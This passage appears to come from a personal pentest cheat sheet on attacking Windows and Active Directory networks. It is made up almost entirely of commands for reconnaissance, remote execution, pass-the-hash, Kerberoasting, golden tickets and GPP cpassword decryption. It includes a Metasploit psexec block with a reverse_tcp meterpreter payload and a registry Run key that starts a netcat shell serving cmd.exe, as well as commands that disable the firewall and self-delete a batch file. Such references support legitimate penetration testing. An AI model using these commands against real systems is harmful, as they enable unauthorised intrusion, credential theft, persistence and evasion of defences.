    $creds = New-Object System.Management.Automation.PSCredential ("username", $secpasswd)
  7. Convert SDDL (Security Descriptor Definition Language) string into human-readable format:

    $ACLObject = New-Object -TypeName System.Security.AccessControl.DirectorySecurity
  8. @echo off (first line) - disable batch command printing
    start /b "" cmd /c del "%~f0"&exit /b - autodelete batch file after completion


  • local proxy settings: curl http://wpad/wpad.dat, curl http://wpad.DOMAIN/wpad.dat
  • klist - manage tickets, sessions, etc.
  • RSoP (Resultant Set of Policies) - rsop.msc (GUI) - gpresult.exe (console)

  • AD recon:

    General SRV DNS records:

    # find Domain Controller
    nslookup -type=any _ldap._tcp.dc._msdcs.DOMAIN.COM
    nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='DOMAIN'"
    dig -t SRV _ldap._tcp.dc._msdcs.DOMAIN.COM
    dig -t SRV _gc._tcp.DOMAIN.COM
    dig -t SRV _ldap._tcp.DOMAIN.COM
    dig -t SRV _kerberos._tcp.DOMAIN.COM
    dig -t SRV _kpasswd._tcp.DOMAIN.COM
 DNS SRV records (big list of DNS SRV records)

    WPAD (Web Proxy Autodiscovery Protocol). Browser at computer with name will search wpad in these locations:


    PAC (Proxy AutoConfig) - file hosted by some server and pointed by proxy settings or wpad.

    • The PAC file is normally named proxy.pac.
    • Urls can be, file:///etc/proxy.pac, …
    • Recommened MIME types: application/x-ns-proxy-autoconfig or application/x-javascript-config
    • File must contain JavaScript function FindProxyForURL(url, host), e.g.

      function FindProxyForURL(url, host)
          return "PROXY; DIRECT";

      Function may have custom proxies depending on url and host parameters


  • Windows download and execute one-liners
  • display list of blocked ports on a firewall with PowerShell
    $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

  • Enable RDP: powershell.exe -w hidden -nop -c "reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f; if($?) {$null = netsh firewall set service type = remotedesktop mod = enable;$null = reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
    Disable RDP: powershell.exe -w hidden -nop -c "reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f; if ($?) { $null = reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"

info about system/yourself

whoami /groups
whoami /all
echo %username%
echo %domain%
set # Enter # environment
net config workstation
wmic qfe list # system's patches
klist sessions # sessions/tickets

nltest /domain_trusts
get-hotfix # system's patches
# getting SID:
whoami /user
wmic useraccount where name='username' get sid
psgetsid # sysinternals package

info about user/group/…

net user # list local users
wmic computersystem get domain
net user phonexicum # info about this user
wmic useraccount where name="phonexicum" # sid, ...
net user /domain # domain's users
net localgroup # list local groups
net localgroup /domain # domain's groups
net group # manipulates groups in domain

psloggedon.exe # logged on users (sysinternals)

net view /all /domain[:DOMAIN_NAME]
 #  list computers in domain/network
 #  only computers with file/printer sharing enabled

current processes / scheduled tasks

schtasks /query /fo LIST /v # list all schedulled tasks
schtasks /query /fo LIST /v /s REMOTE-COMPUTER /u username /p passwd
 # start cmd.exe as SYSTEM user (enables priv elevation for Windows XP)
at 13:01 /interactive "cmd.exe"
schtasks /Create /SC ONCE /TN my_task /TR cmd.exe /SD 13:01 /ET 14:00 /Z

tasklist /SVC # running processes
tasklist /V # running processes - verbose
tasklist /M cmd* # search 

 # using filters:
tasklist /fi "USERNAME ne NT AUTHORITY\SYSTEM" /fi "STATUS eq running"
 # connecting remote (not - you may use `localhost`):
tasklist /SVC /S COMPUTER-NAME-or-IP /U [domain/]username /P passwd

tasklist /APPS # applications from Microsoft Store

services manipulations

net start # list services
net start/pause/stop/continue upnphost
sc start/pause/stop/continue/interrogate upnphost

sc qc upnphost # service information
sc qprivs upnphost 8192
sc qdescription upnphost 8192
sc sdshow MyService # Get permissions in SDDL format
 # For converting SDDL into human readable format look below

 # create service
sc create TestService binpath= "C:\Windows\System32\cmd.exe /C C:\temp\test.bat" start=auto
sc start TestService

 # other
sc queryex upnphost
sc queryex upnphost type=service/userservice/driver/all state=active/inactive/all
get-service / start-service / suspend-service / stop-service / ...


driverquery /V

other commands

type <file> # analogue of linux's 'cat'
taskkill /F /T   /?

cacls # - obsolete, use 'icacls'
icacls <file> # check and change ACL (rights)
subinacl.exe # tool to obtain security information
 # about files, registry, services

dir \S *file_name1* *file_name2*
where /T /R .\ *.txt
findstr /S text # grep ???

netstat -ano # netstat for windows

net share # show shared resources

 # services with access rights
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "test_user" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

network manipulation

ipconfig /all
route print [-4/-6]
netstat -anto
arp -a
 # netbios resolve:
nbtstat -a COMPUTER_NAME
nbtstat -A
nbtstat -c # show cache with IP-addrs

 # firewall
netsh firewall show state
netsh firewall show portopening
netsh firewall show config
netsh advfirewall firewall show rule name=all

netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off # disable firewall
netsh advfirewall set allprofiles state on # enable firewall

netsh advfirewall firewall add rule name="svchost service"
 dir=in action=allow protocol=TCP localport=443
netsh advfirewall firewall add rule name="allow tor browser"
 dir=in action=allow program="C:\Program Files\TorBrowser\TorBrowser.exe"

mount\connect\download remote share

pushd \\\С$ # relocate current terminal

net use # list current connections
net use X: \\\C$ password /User:DOMAIN/phonexicum
net use X: /Delete

smbclient -L // # list shares
    -U 'username%password' -W domain # or use -A authentication file
    -U '%' # connect as anonymous
    -N # connect without password
    -k # connect with kerberos
    --pw-nt-hash # password is nt hash
nmblookup # tool for netbios protocol
nmblookup -A # lookup by ip
mount -t cifs ... # Linux's feature # apt install cifs-utils

 # PowerShell
new-psdrive -Name X -PSProvider FileSystem
 -Root ("\\\C$\Users\phonexicum\Documents") -Credential $cred
remove-psdrive -Name X

MS-RPC commands

rpcclient -U "DOMAIN\username%passwd"

help # !!!

 # netlogon
dsr_getdcname # get DC info
dsr_enumtrustdom # get domain trust info (e.g. forest)

 # lsarpc
lsaquery # get domain name and SID
lookupsids <SID> # resolve sid to name
lookupnames <name> # resolve name to sid

 # samr - Win10 Anniversary edition locked this down
enumdomains # domains in local SAM
enumdomusers # net user

enumalsgroups builtin # query local groups
enumdomgroups # net group
queryaliasmem builtin 0x220 # 0x220 == 544
    # get users in local administrators group

query user <rid>/<name> # net user <user>
querygroupmem <rid> # net group <group>

getdompwinfo # get password complexity policy

registry manipulation

reg query HKLM\software\microsoft\windows\currentversion\run
reg query HKLM\software\microsoft\windows\currentversion\run /ve # default value
reg query HKLM\software\microsoft\windows /f "Adobe\OOBE" /s [/e] [/c]
reg add HKLM\software\microsoft\windows\currentversion\run /v nc /d 'C:\scripts\nc.exe -nvlp 443 -e cmd.exe'
reg query HKLM\software\microsoft\windows\currentversion\run /v nc

some powershell triks

get-hotfix | out-gridview

BITS protocol enables wget functionality on windows (sync\async), including:

  • available protocols: UNC-paths, file:, http:, https:
  • credentials can be of type: BASIC, DIGEST, NTLM, NEGOTIATE, or PASSPORT
  • /DOWNLOAD or /UPLOAD ; custom http headers can be set
  • proxy can be set ; credentials can be set
  • https certificate errors can be ignored ; client certificate can be set # …
  • bits automatically resumes file transfers after network disconnections and after a computer is restarted
 # cmd
bitsadmin /Transfer asdf /DOWNLOAD /PRIORITY FOREGROUND*.tar.gz C:\temp\

bitsadmin /Transfer asdf /DOWNLOAD /PRIORITY FOREGROUND C:\temp\

bitsadmin /Create /DOWNLOAD asdf
bitsadmin /SetPriority asdf FOREGROUND
bitsadmin /SetCredentials asdf SERVER NTLM login pass
bitsadmin /AddFile asdf \\\a\test.txt C:\temp\test.txt
bitsadmin /Resume asdf
bitsadmin /Complete asdf
 # PowerShell
 # Import-Module BitsTransfer
Start-BitsTransfer -Priority Foreground -Source "*.tar.gz" -Destination "C:\temp\"

$Cred = Get-Credential
Start-BitsTransfer -Authentication ntlm -Credential $Cred -Priority Foreground -Source "\\\a\test.txt" -Destination "C:\temp\test.txt"

Specific technics

windows remote management/administration/control/access - winrm/wmic/smb/psexec

Comparison of different remote management tools:

psexec type positives negatives
Sysinternal psexec: 1) Never going to be on any AV list
2) Executes binary as user specified, not as SYSTEM, so no Proxy concerns
1) Need a Password
2) Leaves PSEXESVC running
3) Have to touch disk if not present already
Metasploit psexec 1) Supports the use of Hashes 1) Some AVs flag service binary due to injection techniques used within
2) Rundll32.exe is running
Metasploit psexec-mof 1) Drop a file and Windows automatically runs it. XP and below (only because Metasploit doesn’t automatically compile MOFs)
2) ADMIN$ required (Unless you make code edits)
Metasploit PSEXEC-As-User 1) Executes as the current user
2) No need for passwords or hashes
3) Also a great way to bypass UAC
1) Some AVs flag service binary due to injection techniques used within
2) Rundll32.exe is running
WMI 1) Never going to be on any AV list
2) Executes binary as user specified, not as SYSTEM, so no Proxy concerns
1) Need a Password
Powershell 1) Never going to be on any AV list
2) Executes binary as user specified, not as SYSTEM, so no Proxy concerns
1) Need a Password
RemCom 1) Open source psexec
2) You can add Pass-The-Hash (open source an all)
1) Binary, so again, can’t go over Metasploit sessions directly (portfwd Fu can still be used on a single IP)
2) Runs as SYSTEM
Winexe 1) Open source psexec
2) Supports Pass-The-Hash
1) Binary, so again, can’t go over Metasploit sessions directly (portfwd Fu can still be used on a single IP)
2) Runs as SYSTEM
smbexec 1) Open source psexec
2) Supports Pass-The-Hash
1) Binary (but designed with shoveling over Metasploit in mind)
winrm 1) Never going to be on any AV list
2) Executes binary as user specified, not as SYSTEM, so no Proxy concerns
1) Need a Password
Metasploit PSEXEC-WinRM
(does it exists)
1) Never going to be on any AV list
2) Executes binary as user specified, not as SYSTEM, so no Proxy concerns
1) Need a password

(from “Dirty little secrets they didn’t teach you in pentest class (v2)” (by Rob Fuller (@mubix)))

  • Enter-PSSession -ComputerName PC.DOMAIN.COM - connect remotely with powershell
  • net built upon SAMR protocol (easily analysed by antiviruses)
  • samba commands

  • PsXxxx tools (psexec, psfile, psgetsid, psinfo, pskill, pslist, psloggedon, psloglist, pspasswd, psservice, psshutdown, pssuspend) (get it from SysInternals Suite)

    PsTools utilities (microsoft), PsTools utilities (microsoft) (по-русски), Работа c удаленными рабочими станциями из консоли


    • psexec -accepteula \\computer -u username -p password cmd.exe (-s - run as SYSTEM, -h - run with elevated token
    • psexec \\computer -c binary.exe - copy local binary to remote system and execute it

    requirement for windows 7: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f (or there will be an error: Couldn't access)

    metasploit’s psexec: exploit/windows/smb/psexec - can use pass-the-hash as a password

    use exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp
    set LHOST
    set LPORT 443
    set RHOST
    set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    use post/windows/gather/smart_hashdump
  • nmap smb-psexec.nse

  • remcom - psexec opensource alternative

  • WMI (Windows Management Instrumentation) (WMI has api for cmd, PowerShell, .NET, C++, ActiveX, VBScript) (WMI may connect to remote machine) (Microsoft’s implementation of Web-Based Enterprise Management (WBEM)) - it is object-oriented representation of system’s resources

    WMI can give you access and ability to manipulate almost all system’s resources (processes, services, registry, disks, cpu, groups, shares, …)

    Firewall exceptions:

    • netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes (windows >XP)
    • netsh firewall set service RemoteAdmin enable (windows XP)


    • wmic/wbemtest.exe - console/GUI utility to interact with WMI structure of local/remote computer
    • winmgmt.exe/wmimgmt.msc - console/GUI(MMC snap-in) utility to interact with WMI structure of local computer (looks like it can connect to remote computer)

    Sample wmic commands (usefull wmic queries):

    • remote control: wmic /node: /user:DOMAIN\USERNAME /password:PASSWD logon /format:csv - basic example
    • wmic os get version,caption,name,registereduser,installdate /format:csv
    • wmic qfe list full /format:table - see installed patches on system
    • wmic computersystem list full
    • wmic /namespace:\\root\securitycenter2 path antivirusproduct - get antivirus
    • wmic process get Caption,CommandLine,CSName,ExecutablePath,Handle,ParentProcessID,ProcessID,CreationDate /format:list
    • wmic process call create "cmd.exe /c calc.exe"
    • wmic startup list full /format:table
    • wmic service get /format:htable
    • wmic path Win32_PnPdevice - get peripherals
  • WinRM (Windows Remote Management) service (port num: 5985 (http), 5986 (https)) (Microsoft’s implementation of WS-Management protocol) (traffic is encrypted regardless of HTTPS).
    WinRM must be enabled and WinRM requires computers to trust each other for remove WMI connection (e.g. be in the same domain or add to TrustedHosts winrm set winrm/config/client @{TrustedHosts=""}) (winrm quickconfig). security s**t: YOUR, ATTACKER’s computer must trust the remote computer.


    • winrm - tool for managing local winrm service settings
    • winrs - command-line tool for using winrm


    # Victim: Enable-PSRemoting
    # Enable winrm/psremoting
    Enable-PSRemoting # quick config
    # Add remote host to trusted hosts:
    Set-Item wsman:\localhost\client\trustedhosts
    Test-WsMan # test connection to remote host
    # Check current remote session's permissions
    Get-PSSessionConfiguration | Format-Table -Property Name, Permission -Auto
    Set-PSSessionConfiguration -Name Microsoft.ServerManager -AccessMode Remote -Force
    # Open remote session
    Enter-PSSession -ComputerName -Credential Domain\Username -Authentication Default
    #$SS = New-PSSession -ComputerName -Credential Domain\Username -Authentication Default
    #Get-PSSession Remove-PSSession
    #Invoke-Command -Session $SS -ScriptBlock {Get-Culture}
    # Enter/New-PSSession -SkipCACheck -SkipCNCheck -UseSSL
    # Disable remoting in powershell
    #Stop-Service winrm
    #Set-Service -Name winrm -StartupType Disabled


    # Victim: winrm quickconfig –q
    # Enable winrm
    winrm help config
    winrm qc # quickconfig
    # Add remote host to trusted hosts:
    winrm set winrm/config/service/auth @{Basic="true"}
    winrm set winrm/config/client @{AllowUnencrypted="true";TrustedHosts="<local>"}
    # Connect:
    winrs -r: –u:Domain\Username –p:Password cmd.exe
    # Disable winrm
    winrm delete winrm/config/listener?address=*+transport=HTTP
    sc stop winrm
    sc config winrm start=disabled
  • Remote MMC (Microsoft management console) - works over winrm

Pass-the-hash utilities

  • CrackMapExec - an awesome swiss army knife for pentesting windows networks. Be careful, it can leak credentials throughout the whole network.
    crackmapexec -d DOMAIN -u username -p passwd --shares
    Does not support Kerberos yet
    getting the goods with CrackMapExec: part 1
    getting the goods with CrackMapExec: part 2
  • smbwrapper - wrappers around smbclient and winexe with PTH support
  • Pass-the-hash toolkit (2007) - pth tookit for windows (by core security)
    iam.exe/iam-alt.exe - allows you to change your current session’s NTLM credentials withouth having the cleartext password but the hashes of the password
    whosthere.exe/whosthere-alt.exe - these tools will list logon sessions with NTLM credentials
    genhash.exe - this is a small utility that generates LM and NT hashes
  • SysInternal’s psexec support pass-the-hash and Kerberos. Preliminary ticket or hash injection is required (e.g. using mimikatz).


  • smbclient -U username%nt --pw-nt-hash -L // (careful ! no LM hash, only NT)
  • pth-smbclient - pass-the-hash smb client (kali)
    (export LD_PRELOAD="${LD_PRELOAD:+$LD_PRELOAD }/usr/lib/passing-the-hash/")
  • pth-wmic -U domain/username%ntlm // cmd.exe
  • ./ -hashes ntlm domain/username@ cmd.exe
  • metasploit’s module: exploit/windows/smb/psexec supports path-the-hash (just set ntlm hash as password)

  • impacket ( - has a ton of helpful utilities (see impacket/examples)
    By design impacket is created as a collection of Python classes supporting network protocols (IP, TCP, UDP, ICMP, IGMP, ARP(IPv4 and IPv6) \ NMB and SMB1/2/3 \ DCE/RPC v4 and v5 over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP \ Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC).
    The result was a collection brilliant utilities for penetration testing: psexec, smbrelay, wmiexec, … See better description at IMPACKET (article by CoreSecurity)

    • basic hash usage: -hashes lm:nt or -hashes :nt or -hashes 00000000000000000000000000000000:nt
      e.g. -hashes lm:nt domain/username@
    • -hashes lm:nt DOMAIN/username@ cmd.exe
      1-step: load file using smb (445 port), 2-step: create and execute service using RPC based on uploaded file
    • -hashes lm:nt domain/username@ cmd.exe
      1st approach: work as psexec
      2nd approach: 1-step: start share-server containing file, 2-step: create and execute service using RPC based on file from remote share (attacker’s share)
    • -hashes lm:nt username@ cmd.exe - works by means of DCOM (starts no services and uploads no files)
      does not require to install any service/agent at the target server, runs as Administrator, highly stealthy
    • - similar to wmiexec, but works using differet DCOM endpoints (currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects)
    • atexec - executes a command through the Task Scheduler service

    Known vulnerabilities:

    • - exploit for MS14-068. Saves the golden ticket and also launches a psexec session at the target.
    • - this script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
    • - exploit for CVE-2015-0005 using a SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through netlogon.
  • PsexecSpray - spray hashes and run psexec on working hashes
  • pysmb - an experimental SMB/CIFS library written in python, it implements the client-side SMB/CIFS protocol SMBv1/2
  • metasploit’s Rex library - a variety of classes useful for security testing and exploit development

  • pth tookit (kali linux preinstalled) - e.g. export LD_PRELOAD="${LD_PRELOAD:+$LD_PRELOAD }/usr/lib/passing-the-hash/", etc. tricks
    all this tools exists in not pass-the-hash variant

    • pth-wmic -U 'domain/username%lm:nt' // cmd.exe
      wmic - for “select” requests
    • pth-wmis -U 'domain/username%lm:nt' // 'cmd.exe /c dir c:\ > c:\windows\temp\output.txt'
      wmis - for command execution
    • pth-winexe -U domain/username%lm:nt // cmd.exe
      works similar to psexec (loads file to ADMIN$ share and installs winexesvc service (which is persistant))
    • pth-smbclient -U username%lm:nt //
    • pth-smbget -U 'domain/username%lm:nt' smb://$/windows/system32/drivers/etc/hosts
      pth-smbget -w domain -U username%lm:nt smb://$/windows/system32/drivers/etc/hosts
    • pth-rpcclient -U 'domain/username%lm:nt' // cmd.exe
    • pth-net rpc info -I -U 'domain/username%lm:nt'
    • pth-sqsh -D[DATABASE_NAME] -S[HOST] -U[SERVER_INSTANCE]\\[USERNAME] -mpretty - interactive database shell
  • other linux tools

    • smbcacls --pw-nt-hash --user=domain\\username%ntlm '//' ''
    • rpcclient --pw-nt-hash -U username%ntlm
    • smbclient -U username -W domain --pw-nt-hash '\\\C$' ntlm - does --pw-nt-hash work properly?
    • smbclient -W domain -U username%ntlm --pw-nt-hash '\\\C$' -c 'get "aaa.txt" - does --pw-nt-hash work properly?
    • curl --ntlm -u username:ntlm
    • net
  • other pro tools:

    • mimikatz: privilege::debug sekurlsa::pth /user:username /domain:domain /ntlm:ntlm /run:"mstsc /restrictedadmin /v:"
    • patched smbmount (works only for old kernels)
      export SMBHASH="lm:nt" && ./smbmount // /mnt/target -o username=username
    • wce: wce.exe -s username:domain:lm:nt -c cmd.exe

Kerberos utilities

In order to avoid stupid problems:

  • Do NOT use IP address while relying on Kerberos authentication, use DNS/nbtns/llmnr addresses.
  • Use full domain name (not only last suffix).

setting up Kerberos environment


  • apt-get install krb5-user
  • add into /etc/krb5.conf information about domain, e.g.:

        DOMAIN.COM = {
            kdc = tcp/DC01.DOMAIN.COM:88


  • Setting up not domain Windows machine realm for proper Kerberos support:

    • ksetup /setrealm DOMAIN.COM - set realm for computer
      Kerberos servers must be announced using SRV DNS record _ldap._tcp.dc._msdcs.DOMAIN.COM (optionally SRV record can be replaced by TXT record type)
    • ksetup /setrealm DOMAIN.COM /addkdc DOMAIN.COM KDC-PC.DOMAIN.COM - set realm for computer
      Special DNS records not required.
    • ksetup /DumpState
    • ksetup /RemoveRealm DOMAIN.COM

    Usually almost everything works immediately, no reboot is required. hosts can be used instead of correct DNS server.

Using tools with Kerberos

  • Almost all microsoft’s builtin functionality supports Kerberos (IP addresses not permitted, only domain names).
  • impacket supports Kerberos (/etc/krb5.conf configuration not required, proper DNS setup required):

    • Generate golden (or silver) ticket: -nthash xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -domain-sid S-1-5-21-3213090823-1594857386-3493564324 -domain DOMAIN.COM any_username
    • export KRB5CCNAME='any_username.ccache'; ./ -k -n DOMAIN.COM/any_username@PC01 cmd.exe
  • Linux smbclient tool:
    /etc/krb5.conf configuration required.
    export KRB5CCNAME='tickets_store.ccache'; smbclient -W DOMAIN.COM -k //PC.DOMAIN.COM/C$

LDAP vulnerabilities/tools


  1. LDAP NULL BASE Search Access - LDAP server supports search requests with a NULL or empty base object, it allows information to be retrieved without any prior knowledge of the directory structure
  2. LDAP NULL BIND (anonymous) - you can make ldap request anonymously
  3. LDAP-app may be vulnerable to ldap-injections (OWASP)


  • commands:

    • get user’s base dn: dsquery user -name <known username>, get group’s base dn: dsquery group -name <known group name>
    • convert AD LDAP timestamps to human readable format: date -d "1970-01-01 $((($lastLogon/10000000)- 11676009600)) sec GMT"
  • ldapminer - collect information from LDAP server
  • LDAPBrowser - program to connect to Active Directory and analyse its policy
  • sysintertnal’s AD Explorer

  • ldapsearch - basic syntax: ldapsearch <bind options> -b <base to search from> <search filter> <attributes>
    example: ldapsearch -LLL -H ldap:// -D "" -w password -b dc=domain,dc=com sAMAccountName=username memberOf, in case of “Size Limit Exceeded” use paging -E pr=1000/noprompt

    • ldapsearch -LLL -x -s base -H ldap:// -D "" -w password -b dc=domain,dc=com -d 7 - debug level 7 to check errors

    • most interesting attributes:

      • (objectclass=group) - ldapsearch ... sAMAccountName userPrincipalName memberOf
      • (objectclass=user) - ldapsearch ... sAMAccountName member memberOf
      • (objectclass=computer) - ldapsearch ... name dNSHostname operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName
    • ldapsearch -x -s base -H -p 389 '(objectclass=*)' - get object from the base of the directory
      ldapsearch -x -s base -H -p 389 '(objectclass=*)' '*' + - get object and all its attributes from the base of directory
      ldapsearch -x -s sub -H -p 389 '(objectclass=*)' - get everything in the directory


    • list all registered SPN’s: ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(servicePrincipalName=*)" serviceprincipalname
      NOT all SPN’s are explicitly registered in Active Directory. A lot (e.g. cifs, …) are mapped to SPN HOST/host.domain. Active Directory Service Principal Names (SPNs) descriptions
    • users without passwords: ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" (PASSWD_NOTREQD)
    • users with disabled Kerberos pre-authenticate feature: ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) (DONT_REQ_PREAUTH)
    • probable service accounts:
        users without password expiration: ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(objectCategory=user)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" dn (DONT_EXPIRE_PASSWORD)
        get service accounts by name: ldapsearch -LLL -H ldap://ADTEST.LOCAL -D "pupkin@adtest.local" -w Pupkin3189EQio -b dc=adtest,dc=local "(&(objectClass=user)(|(name=*ervice*)(name=*srv*)))" dn

    • get effective domain admins: ldapsearch -LLL -H ldap:// -D "" -w password -b dc=domain,dc=com "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=domain,DC=com))" memberOf
    • get effective local admins: ldapsearch -LLL -H ldap:// -D "" -w password -b dc=domain,dc=com "adminCount=1" dn
      Admin-Count attribute - indicates that a given object has had its ACLs changed to a more secure value by the system because it was a member of one of the administrative groups (directly or transitively).
    • find GPO names and locations: ldapsearch -LLL -H ldap:// -D "" -w password -b dc=domain,dc=com "objectClass=groupPolicyContainer" displayName gPCFileSysPath

    • find SPNs (for kerberoasting):
      ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" dn sAMAccountName servicePrincipalName msDS-AllowedToDelegateTo (NORMAL_ACCOUNT and not ACCOUNTDISABLE)

    • users/computers with delegation:

      • unconstrained delegation: ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn cn sAMAccountname objectCategory (TRUSTED_FOR_DELEGATION)
      • constrained delegation (Kerberos only): ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(&(msDS-AllowedToDelegateTo=*)(!(userAccountControl:1.2.840.113556.1.4.803:=16777216))))" dn sAMAccountname servicePrincipalName msDS-AllowedToDelegateTo (msDS-AllowedToDelegateTo and not TRUSTED_TO_AUTH_FOR_DELEGATION)
      • constrained delegation (protocol transition): ldapsearch -LLL -H ldap:// -D "" -W -b dc=domain,dc=com "(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(userAccountControl:1.2.840.113556.1.4.803:=16777216))" dn sAMAccountname servicePrincipalName msDS-AllowedToDelegateTo (TRUSTED_TO_AUTH_FOR_DELEGATION))

SPN / Kerberoasting

SPN (Service Principal Name) - <service class>/<host>:<port>/<service name>. SPN is used to map AD account to a service.
SPN manipulations can be done from any domain computer:

  • setspn -T -F -Q */* - extract all accounts in use as SPN
  • setspn -L service_account - list all service’s SPN registered for account
  • setspn -s http/ domain\service_account - add new SPN

Kerberoast - the idea of requesting TGS ticket (which is signed with service’s hash) and make offline bruteforce of service’s password.
Kerberoasting are very effective with Kerberos delegation trick.

If pre-authentication is disabled, obtained TGT ticket for CUSTOM user can be bruteforced in offline mode.

nidem/kerberoast ( - a series of tools for kerberoasting workflow

Manual workchain:

  • search for target service’s account (service with enabled delegation) or target user’s account (user with disabled Kerberos pre-authentication)

    • use ldap queries
    • use impacket’s ./ -request DOMAIN.COM/any_user:passwd (find delegation services)
    • Invoke-Kerberoast.ps1 (gist)
  • Get user’s account password or NTLM hash

    • export hashes or tickets from memory mimikatz # kerberos::list /export or PowerView, …
    • request ticket for service and bruteforce it

      requesting TGS ticket for bruteforcing service’s account password:

      • use impacket’s TGS requester ./ -request DOMAIN.COM/any_user:passwd
        or try $ticket = Get-TGSCipher -SPN service/
      • Kerberos 5 TGS-REP etype 23: hashcat64.exe -m 13100 -a 0 -w 3 C:\temp\hash.txt C:\temp\dict.txt -o C:\temp\recovered.txt
      • got service’s account password

      requesting user’s TGT ticket in case Kerberos pre-authentication is disabled:

      • use custom TGT requester Get-ASREPHash -UserName pupkin -Domain ADTEST.LOCAL -Server WS2012R2DC.adtest.local ASREPRoast or it can be extracted with pcredz tool from pcap dump
      • Kerberos 5 AS-REQ Pre-Auth etype 23: hashcat64.exe -m 7500 -a 0 -w 3 C:\temp\hash.txt C:\temp\dict.txt -o C:\temp\recovered.txt
        this hashcat cipher seems broken or designed for some other hash ($krb5pa$23$). JtR (John the Ripper) can be used instead ./john hashes.txt --wordlist=words.txt
      • got user’s password
  • impersonate custom user before custom SPN service (service’s account password required)
    user impacket’s ./ -spn cifs/COMPUTER.DOMAIN.COM -impersonate Administrator DOMAIN.COM/service_username:passwd

Active Directory explore

  • sharesearch - samba/NFS spider, detects available shares and grep them for passwords
    supports ntlm hashes
  • SMBCrunch - smth like grep for credentials and other sensitive data through publicly available shares

  • NetBios (smb, …) scanners:

    • nbtscan
      nbtscan, nbtscan -r
    • keimpx (keimpx (github)) - quick check for valid credentials across a network over SMB. Be carefull it can leak credentials to all computers!
      keimpx -v 1 -b -l 'hosts.txt' -D domain -U username -P password
      keimpx -v 1 -b -l 'hosts.txt' -U username --lm=lm_hash --nt=nt_hash (keimpx supports pass-the-hash too)
    • LanScope (FREE for personal use) - will show you all the shared resources, including system and hidden NetBIOS (Samba) shared resources
    • enum4linux - enumerating data from Windows and Samba hosts
  • Dump AD

    • BloodHound - program to get info from Active Directory and create informative graph for analysing permissions and access (Bloodhound getting-started)
      collecting info: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -WindowStyle Hidden -Command "cd c:\Temp; Import-Module C:\Temp\SharpHound.ps1; Invoke-BloodHound" (ingestors are in resources/app/Ingestors)
      running bloodhound: download latest release and import there all csv files generated by injestor (default authentication at bolt://localhost:7687, login: neo4j, password: BloodHound/neo4j)

    • Goddi - Go Dump Domain Info - dump active directory domain information
    • windapsearch - python script to enumerate users, groups and computers from a Windows domain through LDAP queries
      ./windapsearch -d -u domain\username -p password
  • Groups.xml (these are files in sysvol used by admins to deploy configuration between computers within domain.)

    • Find-GPOPasswords.txt - the PowerShell script code (Find-GPOPasswords) that will discover Group Policy Preference XML file data in SYSVOL and provide a CSV report
    • PowerShellEmpire has module for searching cpasswords: privesc/windows/get_gpppasswords

    • Manual analysis (in cpassword attribute admins may have left some credentials almost unencrypted (the crypto-key can be found at microsoft’s web-site))

      • \\[server_name]\sysvol\[domain_name]\Policies\[group_policy_ name]\Machine\Preferences\Groups\Groups.xml (default DC location: C:\Windows\SYSVOL)
        possible sources: groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml, Drives.xml
      • echo "BASE64 STRING" | openssl enc -d -base64 -A -in - -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 000000000000000000000000000000 - command to decrypt cpassword from AD’s Groups.xml

      Groups.xml may contain credentials related to (подробное описание): local users and groups, drive maps, data sources, scheduled tasks, services

      Groups.xml remedy:
      • Use LAPS - Local Administrator Password Solution
      • use SCCM - System Center Configuration Manager
